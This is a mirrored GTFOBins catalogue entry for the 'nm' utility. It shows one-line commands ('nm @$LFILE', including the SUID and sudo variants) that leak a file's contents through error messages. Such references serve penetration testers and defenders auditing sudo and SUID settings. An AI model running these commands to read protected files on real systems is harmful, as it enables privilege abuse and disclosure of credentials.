1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00
GTFOBins.github.io/_gtfobins/nm.md
valdaarhun 7e2e188305
Add nm file-read
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-02-03 08:46:38 +01:00

397 B

description functions
The file content is treated as command line options and disclosed through error messages, so this is not suitable for reading arbitrary binary data.
file-read suid sudo
code
LFILE=file_to_read nm @$LFILE
code
LFILE=file_to_read ./nm @$LFILE
code
LFILE=file_to_read sudo nm @$LFILE